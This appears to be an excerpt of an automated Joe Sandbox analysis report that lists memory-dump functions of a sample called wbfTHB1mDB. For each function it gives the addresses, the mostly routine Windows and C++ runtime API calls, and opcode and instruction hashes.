Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 523722e26ffa46449d979bd975143a43a29be3ae997596a7a20ff96f8c1017ee
Instruction ID: 26743427b018835c0b71eae4bf9b4933dd8744ffdb74c66ec971653fafccf59e
Opcode Fuzzy Hash: 523722e26ffa46449d979bd975143a43a29be3ae997596a7a20ff96f8c1017ee
Instruction Fuzzy Hash: DED1CF32754A808AE711CFA5D4402EC77F6F356BD8F04C226DE5A97B99DE38C61AC390

Function 0000018C89AAB248 Relevance: 6.2, APIs: 4, Instructions: 218COMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 0000018C89AAB364
GetLastError.KERNEL32 ref: 0000018C89AAB3EF

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 051a95757f3cd31bcbf302130b81a7499006cb3b8c40f8426fd2f443c90a72fc
Instruction ID: 6c6dbe307cc13bf7f8f8d738f8e787de22ee4764050639ba8d8a9b3764dcf8d9
Opcode Fuzzy Hash: 051a95757f3cd31bcbf302130b81a7499006cb3b8c40f8426fd2f443c90a72fc
Instruction Fuzzy Hash: 8491E6727506508BFB60CF6594803EDABE0F786B88F54C12ADE0A57A95CF34C64AC7A0

Function 00007FF6A7049B40 Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7049C80
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7049C86
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7049CE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7049D7C

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: ccfe53ba09f4fe5ed3b1926650209fc6c0cace94c63fa37a7c28710fcedfeb16
Instruction ID: 8f1fa61c28afdf5492c3d30b7b174cd6ada96b65b57f5f04fc1324775e61ceff
Opcode Fuzzy Hash: ccfe53ba09f4fe5ed3b1926650209fc6c0cace94c63fa37a7c28710fcedfeb16
Instruction Fuzzy Hash: F15124B2B2A68181EE249F21E1143BD63A1EB14BC5F588531DB5DCB785DF7CE5A09300

Function 0000018C89A94220 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0000018C89A94240
FreeEnvironmentStringsW.KERNEL32 ref: 0000018C89A9433B
RtlInitUnicodeString.NTDLL ref: 0000018C89A943AE
RtlInitUnicodeString.NTDLL ref: 0000018C89A943BB

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: EnvironmentInitStringStringsUnicode$Free
String ID:
API String ID: 2488768755-0
Opcode ID: 2b2f1f90d0b32243a53be456331d7bdf6004e7484ecf8859458b1b26bd362795
Instruction ID: b707712f8747a03afe97fdf8d7003af7ae0336736e1236878b221a8b0c43c4cc
Opcode Fuzzy Hash: 2b2f1f90d0b32243a53be456331d7bdf6004e7484ecf8859458b1b26bd362795
Instruction Fuzzy Hash: C4518B32A14B8482EB108F25E4403DE73A0F79AB94F55D215EBA903B95DF78E6E5C350

Function 0000018C89A50120 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0000018C89ACA8FC: std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89ACA919
Part of subcall function 0000018C89ACA8FC: std::locale::_Setgloballocale.LIBCPMT ref: 0000018C89ACA93C

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A50161
std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A50186
std::_Facet_Register.LIBCPMT ref: 0000018C89A50232
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A50294

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
String ID:
API String ID: 3698853521-0
Opcode ID: 7fc3597cd9704a6304594a27bb2dfeeca3e59ce2e728f14c12add50f8541c22a
Instruction ID: d56bd3811d0a8b343af406fc6188e9acb9ce31f9a0c5d8aaa65f89044869329a
Opcode Fuzzy Hash: 7fc3597cd9704a6304594a27bb2dfeeca3e59ce2e728f14c12add50f8541c22a
Instruction Fuzzy Hash: 32419132390B4085EB50DB51E8843EA33A4F786B94F59C521EE9E477A5DF38C659C3A0

Function 0000018C89AA0274 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA02ED
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA0349
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA0384
_invalid_parameter_noinfo.LIBCMT ref: 0000018C89AA03A9

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f47f5365830de18e31c9f66efcfcebced3ed900e80df05c2fe820f8996efde49
Instruction ID: ecc99b8162fc2a044d836ce4c7e5162cb6187fcc09d9557698d10a65fcf3375c
Opcode Fuzzy Hash: f47f5365830de18e31c9f66efcfcebced3ed900e80df05c2fe820f8996efde49
Instruction Fuzzy Hash: 3D414F72144A94CBE7528F21C4603ED7BE0E747F44F0AC051D68A47386DE39864DC3B6

Function 0000018C89A639F0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A63A1B
std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A63A40
std::_Facet_Register.LIBCPMT ref: 0000018C89A63AEB
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A63B36

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 268a738e79390acd07def2dc4d1be91678e0d7bbd421806bae9408622498fc9b
Instruction ID: 23cf71bd5ecd3eb1647a84d5a47f9b32609088795f0105af0d2a28cd8196b0ee
Opcode Fuzzy Hash: 268a738e79390acd07def2dc4d1be91678e0d7bbd421806bae9408622498fc9b
Instruction Fuzzy Hash: 7141D736290B4085FB21DF15F8443EA77A0F396BA4F49C111EA4D077A5DF38C64AC3A0

Function 0000018C89A84940 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A8496B
std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A84990
std::_Facet_Register.LIBCPMT ref: 0000018C89A84A3B
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A84A86

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 225fe1b72370eebaf99dac6ca4c61f0c7a8ae1283e1f422937767657019483ac
Instruction ID: 34c3210261cc7c7173b5a9c1683079b8ae4e4cb8d27f076894b7d557b37d789a
Opcode Fuzzy Hash: 225fe1b72370eebaf99dac6ca4c61f0c7a8ae1283e1f422937767657019483ac
Instruction Fuzzy Hash: 7C41E632290B5085FB20DB15E4803EA73A0F346FA4F09C511EA9D1B7A5DF38C64AC3A0

Function 0000018C89A51DD0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A51DFB
std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A51E20
std::_Facet_Register.LIBCPMT ref: 0000018C89A51ECB
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A51F16

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: deae80201b058b93dee9511eb23f4883bce05ec3d16f28b31309998fe1f492bf
Instruction ID: 908c9a12d3d2546337e3e8fd2c1508da1db7a27755d62c14c5fb095e1c054582
Opcode Fuzzy Hash: deae80201b058b93dee9511eb23f4883bce05ec3d16f28b31309998fe1f492bf
Instruction Fuzzy Hash: A7419632394A4085FB20DB55E9503FA7360F34AB98F58C511EE8D477A5DF38C649C7A0

Function 0000018C89A840C0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A840EB
std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A84110
std::_Facet_Register.LIBCPMT ref: 0000018C89A841BB
Concurrency::cancel_current_task.LIBCPMT ref: 0000018C89A84206

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: f751cf97cbdb91efc437d10692cdb5900781dee89e6afe037389110580d2090b
Instruction ID: 3a05a4644e1c10a83a76c2751db3f17fe64ae431a96abeb270bac23d72f0c9c1
Opcode Fuzzy Hash: f751cf97cbdb91efc437d10692cdb5900781dee89e6afe037389110580d2090b
Instruction Fuzzy Hash: 6E41C432294B4084FB20DB15E8403EA77A0F39AFE4F59C111EA4D177A5DF38C65AC3A0

Function 00007FF6A7042810 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A704283B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6A7042860
std::_Facet_Register.LIBCPMT ref: 00007FF6A704290B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6A7042956

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 1168246061-0
Opcode ID: 3a769e8cb690939059ebf57778ce7d24e14301819ffc5f3cd8bedc43d4ee7ce3
Instruction ID: 1a4eea3c753b1a496badd5b5ea8c6b55d0da3e5f99d8defbb44c58fd8a15d35e
Opcode Fuzzy Hash: 3a769e8cb690939059ebf57778ce7d24e14301819ffc5f3cd8bedc43d4ee7ce3
Instruction Fuzzy Hash: A841D366B0EA4289FA15DF15E94027973A0FF68B94F080635EA4DC77A9CF3CE452C308

Function 0000018C89AC9704 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 0000018C89AC974D
GetLastError.KERNEL32 ref: 0000018C89AC975B
WideCharToMultiByte.KERNEL32 ref: 0000018C89AC9790
GetLastError.KERNEL32 ref: 0000018C89AC979E

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 885017ec562e008ced87b7a088d7b161d23e12804f5abb955417809e776ebcf4
Instruction ID: 473da50b83eb1be9f375574f0d8add832a84b7107e43eeab450c61fcaac4298b
Opcode Fuzzy Hash: 885017ec562e008ced87b7a088d7b161d23e12804f5abb955417809e776ebcf4
Instruction Fuzzy Hash: 55215C76614B84C7E7208F21E4443DEBAB4F3CAF94F248228DB8967B58DF39C6158B50

Function 0000018C89AC9BF0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0000018C89AC9520: GetModuleHandleW.KERNEL32 ref: 0000018C89AC9536
Part of subcall function 0000018C89AC9520: GetProcAddress.KERNEL32 ref: 0000018C89AC9546

GetLastError.KERNEL32 ref: 0000018C89AC9C14

Part of subcall function 0000018C89AA7BC4: IsProcessorFeaturePresent.KERNEL32 ref: 0000018C89AA7BEA

GetFileAttributesW.KERNEL32 ref: 0000018C89AC9C23
__std_fs_open_handle.LIBCPMT ref: 0000018C89AC9C4C
CloseHandle.KERNEL32 ref: 0000018C89AC9C5E

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Handle$AddressAttributesCloseErrorFeatureFileLastModulePresentProcProcessor__std_fs_open_handle
String ID:
API String ID: 156590933-0
Opcode ID: ab22cb6cb8c17ed70bd3674071cc7aa31663a6931c8f4e60418ec3b925b4023f
Instruction ID: 4c07df9f989f095b5d4b31d4dc2f7515d9a33cf1b6e89e7dab24d85a258281fb
Opcode Fuzzy Hash: ab22cb6cb8c17ed70bd3674071cc7aa31663a6931c8f4e60418ec3b925b4023f
Instruction Fuzzy Hash: EA110A31258600C9FB504725E0C43EA62A1E7C6BF9F11C610FA775BAE4DE38C2488B90

Function 00007FF6A706DB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6A706DB2C
GetCurrentThreadId.KERNEL32 ref: 00007FF6A706DB3A
GetCurrentProcessId.KERNEL32 ref: 00007FF6A706DB46
QueryPerformanceCounter.KERNEL32 ref: 00007FF6A706DB56

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 1d716b8a3445a5a0872bb1fe03444624e5d71f17f3b0535b1150a759f8b14a6e
Instruction ID: d747e2d611b4325eb696e3de47c77caecce06ab8d74a47d49b887071e59b9f30
Opcode Fuzzy Hash: 1d716b8a3445a5a0872bb1fe03444624e5d71f17f3b0535b1150a759f8b14a6e
Instruction Fuzzy Hash: 2C111822B16F018AEB008F61E8542A933A4FB19759F441A31DA6DC6BA8DF78E1A48340

Function 0000018C89A3EAA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

[json.exception., xrefs: 0000018C89A3EBDB

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID: [json.exception.
API String ID: 0-791563284
Opcode ID: 9312c027d5fae459814da3f46332f521891fa988a0930d2691346a9914b04737
Instruction ID: 0686b3b5f1e16bda7bf6dcf1aa6ae7b65a8518fc2a05c45920b969f7ffe226ec
Opcode Fuzzy Hash: 9312c027d5fae459814da3f46332f521891fa988a0930d2691346a9914b04737
Instruction Fuzzy Hash: 63710372B50B9086FB00CF79E8503ED27A1E796B94F64C215DE5917B8ACF78C285C390

Function 0000018C89A84EC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A84F2F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000018C89A84F77

Strings

bad locale name, xrefs: 0000018C89A8504C

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: c2242086e5ffbf2c74512843f4cad934884c5df78fb0d4ea585fbc485e6e3e3c
Instruction ID: d99eded13a60842f397443c3f8b704f96ce2d8fc1637ef46df14964f7ad697b3
Opcode Fuzzy Hash: c2242086e5ffbf2c74512843f4cad934884c5df78fb0d4ea585fbc485e6e3e3c
Instruction Fuzzy Hash: FB511832741A4099EB15DFB0D4903FC37A4FB46B48F54C025EE4967A96DF34CA6AC3A4

Function 0000018C89A64780 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A647EF
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000018C89A64837

Strings

bad locale name, xrefs: 0000018C89A64916

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: b25bddd62055f5969316eca4a71264c41348d294c5c4d2b5ea325c8ad44bcbd3
Instruction ID: 956569f188e9d6fd537f53f718da4555d12ec68eac644bbf0b616fc466d44332
Opcode Fuzzy Hash: b25bddd62055f5969316eca4a71264c41348d294c5c4d2b5ea325c8ad44bcbd3
Instruction Fuzzy Hash: 1B516B32382B4099FB11DFB0D4903EC33A4FB56B48F04C525EA4967A96DF34CA69C3A4

Function 0000018C89AB1068 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000018C89AB6448: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89AB647B

_get_daylight.LIBCMT ref: 0000018C89AB1180
_get_daylight.LIBCMT ref: 0000018C89AB1191

Strings

?, xrefs: 0000018C89AB1111

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: cc61daf68fc51e1744773e59e44ac92936385923c50019f164254ef25fcaf87b
Instruction ID: a3409f8b9ab0f155dc220f7866dde40e48a5ceda3d1a239caceb24be8745bf42
Opcode Fuzzy Hash: cc61daf68fc51e1744773e59e44ac92936385923c50019f164254ef25fcaf87b
Instruction Fuzzy Hash: 474109333447C066FB609B25E4513EA66A0E783BA4F14C225EF5907AD5EF38C685C790

Function 0000018C89AAAF20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000018C89AAB037
GetLastError.KERNEL32 ref: 0000018C89AAB059

Strings

U, xrefs: 0000018C89AAAFE3

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 95c1b5a9b453dd21b53d1d3abd175e481a437f6821d85bbfa209bab1ceee3d57
Instruction ID: 00dbe22235235cb2b8d8574776462d46a48e8b087de1d21600744657c44d88ac
Opcode Fuzzy Hash: 95c1b5a9b453dd21b53d1d3abd175e481a437f6821d85bbfa209bab1ceee3d57
Instruction Fuzzy Hash: ED41A072314A8086DB20DF65E8443EAB7A1F799784F40C125EE4E87B98EF7CC645C7A0

Function 00007FF6A7052C62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052CB8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7052CF4

Strings

Number is too big., xrefs: 00007FF6A7052CB1

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
String ID: Number is too big.
API String ID: 1132134225-3173473636
Opcode ID: c199d333f1b9cab04b9b1dbb8748059f08981d1f8fb7dc04a3d92c236ba5b13e
Instruction ID: 673832b595e402c8f0e274aeaf5c78556e92c80dca5b9fa967cec76bc5d17dd1
Opcode Fuzzy Hash: c199d333f1b9cab04b9b1dbb8748059f08981d1f8fb7dc04a3d92c236ba5b13e
Instruction Fuzzy Hash: A311FEE3C091074FFA4A7F70546A2FA2B50EF61311FD18E34E6A8C5993FCA936164694

Function 00007FF6A7052B32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052B88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7052BC4

Strings

Number is too big., xrefs: 00007FF6A7052B81

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
String ID: Number is too big.
API String ID: 1132134225-3173473636
Opcode ID: e27543cdf6f61a29e8ddc80b75bd824cddccc2a0fb75e3bf775b0164ce3b1caa
Instruction ID: e77863975328dc00eaf735a42dbddbbc6c2fd880a5d912fb374e48242dcc82ef
Opcode Fuzzy Hash: e27543cdf6f61a29e8ddc80b75bd824cddccc2a0fb75e3bf775b0164ce3b1caa
Instruction Fuzzy Hash: 6D116AE280E2874FE205AF78A55A4AD3E509F01B08F248E39DBA8C2887ED1D70B0C345

Function 0000018C89ABF198 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 0000018C89ABF1E8
RaiseException.KERNEL32 ref: 0000018C89ABF229

Strings

csm, xrefs: 0000018C89ABF216

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4d2c4101b9d2858735cfea5a09a2e9289d44dfdbc7b24173af3d04f9105eea82
Instruction ID: 078c02f03bd05db1caa3216b1099d7c0d0e57786b3bf6c9597d6443d865fc42c
Opcode Fuzzy Hash: 4d2c4101b9d2858735cfea5a09a2e9289d44dfdbc7b24173af3d04f9105eea82
Instruction Fuzzy Hash: 0C112836215B8482EB618B25F4402D9B7E4F78AB94F588621EFCD07B68EF38C655CB40

Function 00007FF6A706EDA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A7041E0F), ref: 00007FF6A706EDF4
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6A7041E0F), ref: 00007FF6A706EE35

Strings

csm, xrefs: 00007FF6A706EE22

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
